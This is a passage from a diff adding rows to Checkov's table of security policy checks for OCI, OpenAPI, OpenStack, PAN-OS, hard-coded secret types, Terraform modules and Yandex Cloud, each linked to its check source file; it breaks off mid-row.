+| 3623 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) |
+| 3624 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) |
+| 3625 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
+| 3626 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
+| 3627 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
+| 3628 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) |
+| 3629 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) |
+| 3630 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) |
+| 3631 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) |
+| 3632 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) |
+| 3633 | CKV_OPENAPI_1 | resource | securityDefinitions | Ensure that securityDefinitions is defined and not empty - version 2.0 files | OpenAPI | [SecurityDefinitions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitions.py) |
+| 3634 | CKV_OPENAPI_2 | resource | security | Ensure that if the security scheme is not of type 'oauth2', the array value must be empty - version 2.0 files | OpenAPI | [Oauth2SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py) |
+| 3635 | CKV_OPENAPI_3 | resource | components | Ensure that security schemes don't allow cleartext credentials over unencrypted channel - version 3.x.y files | OpenAPI | [CleartextOverUnencryptedChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py) |
+| 3636 | CKV_OPENAPI_4 | resource | security | Ensure that the global security field has rules defined | OpenAPI | [GlobalSecurityFieldIsEmpty.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py) |
+| 3637 | CKV_OPENAPI_5 | resource | security | Ensure that security operations is not empty. | OpenAPI | [SecurityOperations.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/SecurityOperations.py) |
+| 3638 | CKV_OPENAPI_6 | resource | security | Ensure that security requirement defined in securityDefinitions - version 2.0 files | OpenAPI | [SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityRequirement.py) |
+| 3639 | CKV_OPENAPI_7 | resource | security | Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions are open to interception- version 2.0 files | OpenAPI | [PathSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/PathSchemeDefineHTTP.py) |
+| 3640 | CKV_OPENAPI_8 | resource | security | Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityPasswordFlow.py) |
+| 3641 | CKV_OPENAPI_9 | resource | paths | Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files | OpenAPI | [OperationObjectSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectSecurityScopeUndefined.py) |
+| 3642 | CKV_OPENAPI_10 | resource | paths | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2OperationObjectPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2OperationObjectPasswordFlow.py) |
+| 3643 | CKV_OPENAPI_11 | resource | securityDefinitions | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionPasswordFlow.py) |
+| 3644 | CKV_OPENAPI_12 | resource | securityDefinitions | Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionImplicitFlow.py) |
+| 3645 | CKV_OPENAPI_13 | resource | securityDefinitions | Ensure security definitions do not use basic auth - version 2.0 files | OpenAPI | [SecurityDefinitionBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitionBasicAuth.py) |
+| 3646 | CKV_OPENAPI_14 | resource | paths | Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files | OpenAPI | [OperationObjectImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectImplicitFlow.py) |
+| 3647 | CKV_OPENAPI_15 | resource | paths | Ensure that operation objects do not use basic auth - version 2.0 files | OpenAPI | [OperationObjectBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectBasicAuth.py) |
+| 3648 | CKV_OPENAPI_16 | resource | paths | Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files | OpenAPI | [OperationObjectProducesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectProducesUndefined.py) |
+| 3649 | CKV_OPENAPI_17 | resource | paths | Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files | OpenAPI | [OperationObjectConsumesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectConsumesUndefined.py) |
+| 3650 | CKV_OPENAPI_18 | resource | schemes | Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files | OpenAPI | [GlobalSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSchemeDefineHTTP.py) |
+| 3651 | CKV_OPENAPI_19 | resource | security | Ensure that global security scope is defined in securityDefinitions - version 2.0 files | OpenAPI | [GlobalSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSecurityScopeUndefined.py) |
+| 3652 | CKV_OPENAPI_20 | resource | paths | Ensure that API keys are not sent over cleartext | OpenAPI | [ClearTextAPIKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/ClearTextAPIKey.py) |
+| 3653 | CKV_OPENAPI_21 | resource | paths | Ensure that arrays have a maximum number of items | OpenAPI | [NoMaximumNumberItems.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/NoMaximumNumberItems.py) |
+| 3654 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) |
+| 3655 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) |
+| 3656 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) |
+| 3657 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) |
+| 3658 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) |
+| 3659 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) |
+| 3660 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) |
+| 3661 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) |
+| 3662 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) |
+| 3663 | CKV_PAN_2 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoHTTP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoHTTP.yaml) |
+| 3664 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) |
+| 3665 | CKV_PAN_3 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoTelnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoTelnet.yaml) |
+| 3666 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) |
+| 3667 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) |
+| 3668 | CKV_PAN_4 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure DSRI is not enabled within security policies | Ansible | [PanosPolicyNoDSRI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoDSRI.yaml) |
+| 3669 | CKV_PAN_5 | 
resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 3670 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 3671 | CKV_PAN_5 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'application' set to 'any' | Ansible | [PanosPolicyNoApplicationAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoApplicationAny.yaml) | +| 3672 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 3673 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 3674 | CKV_PAN_6 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'service' set to 'any' | Ansible | [PanosPolicyNoServiceAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoServiceAny.yaml) | +| 3675 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | 
[PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 3676 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 3677 | CKV_PAN_7 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_ip' and 'destination_ip' both containing values of 'any' | Ansible | [PanosPolicyNoSrcAnyDstAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcAnyDstAny.yaml) | +| 3678 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 3679 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 3680 | CKV_PAN_8 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure description is populated within security policies | Ansible | [PanosPolicyDescription.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyDescription.yaml) | +| 3681 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 3682 | CKV_PAN_9 | resource | 
panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 3683 | CKV_PAN_9 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure a Log Forwarding Profile is selected for each security policy rule | Ansible | [PanosPolicyLogForwarding.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogForwarding.yaml) | +| 3684 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 3685 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 3686 | CKV_PAN_10 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session end is enabled within security policies | Ansible | [PanosPolicyLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLoggingEnabled.yaml) | +| 3687 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 3688 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | 
[NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 3689 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 3690 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 3691 | CKV_PAN_12 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Ansible | [PanosIPsecAuthenticationAlgorithms.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecAuthenticationAlgorithms.yaml) | +| 3692 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 3693 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 3694 | CKV_PAN_13 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure protocols | Ansible | 
[PanosIPsecProtocols.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecProtocols.yaml) | +| 3695 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3696 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3697 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3698 | CKV_PAN_14 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Ansible | [PanosZoneProtectionProfile.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneProtectionProfile.yaml) | +| 3699 | CKV_PAN_15 | resource | panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 3700 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 3701 | CKV_PAN_15 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Ansible | 
[PanosZoneUserIDIncludeACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneUserIDIncludeACL.yaml) | +| 3702 | CKV_PAN_16 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels | Ansible | [PanosPolicyLogSessionStart.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogSessionStart.yaml) | +| 3703 | CKV_PAN_17 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_zone' and 'destination_zone' both containing values of 'any' | Ansible | [PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml) | +| 3704 | CKV_SECRET_1 | Artifactory Credentials | secrets | Artifactory Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3705 | CKV_SECRET_2 | AWS Access Key | secrets | AWS Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3706 | CKV_SECRET_3 | Azure Storage Account access key | secrets | Azure Storage Account access key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3707 | CKV_SECRET_4 | Basic Auth Credentials | secrets | Basic Auth Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3708 | 
CKV_SECRET_5 | Cloudant Credentials | secrets | Cloudant Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3709 | CKV_SECRET_6 | Base64 High Entropy String | secrets | Base64 High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3710 | CKV_SECRET_7 | IBM Cloud IAM Key | secrets | IBM Cloud IAM Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3711 | CKV_SECRET_8 | IBM COS HMAC Credentials | secrets | IBM COS HMAC Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3712 | CKV_SECRET_9 | JSON Web Token | secrets | JSON Web Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3713 | CKV_SECRET_11 | Mailchimp Access Key | secrets | Mailchimp Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3714 | CKV_SECRET_12 | NPM tokens | secrets | NPM tokens | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3715 | CKV_SECRET_13 | Private Key | secrets | Private Key | secrets | 
[policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3716 | CKV_SECRET_14 | Slack Token | secrets | Slack Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3717 | CKV_SECRET_15 | SoftLayer Credentials | secrets | SoftLayer Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3718 | CKV_SECRET_16 | Square OAuth Secret | secrets | Square OAuth Secret | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3719 | CKV_SECRET_17 | Stripe Access Key | secrets | Stripe Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3720 | CKV_SECRET_18 | Twilio API Key | secrets | Twilio API Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3721 | CKV_SECRET_19 | Hex High Entropy String | secrets | Hex High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3722 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | +| 3723 | CKV_TF_2 | module | module 
| Ensure Terraform module sources use a tag with a version number | Terraform | [RevisionVersionTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionVersionTag.py) | +| 3724 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3725 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3726 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3727 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3728 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3729 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3730 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. 
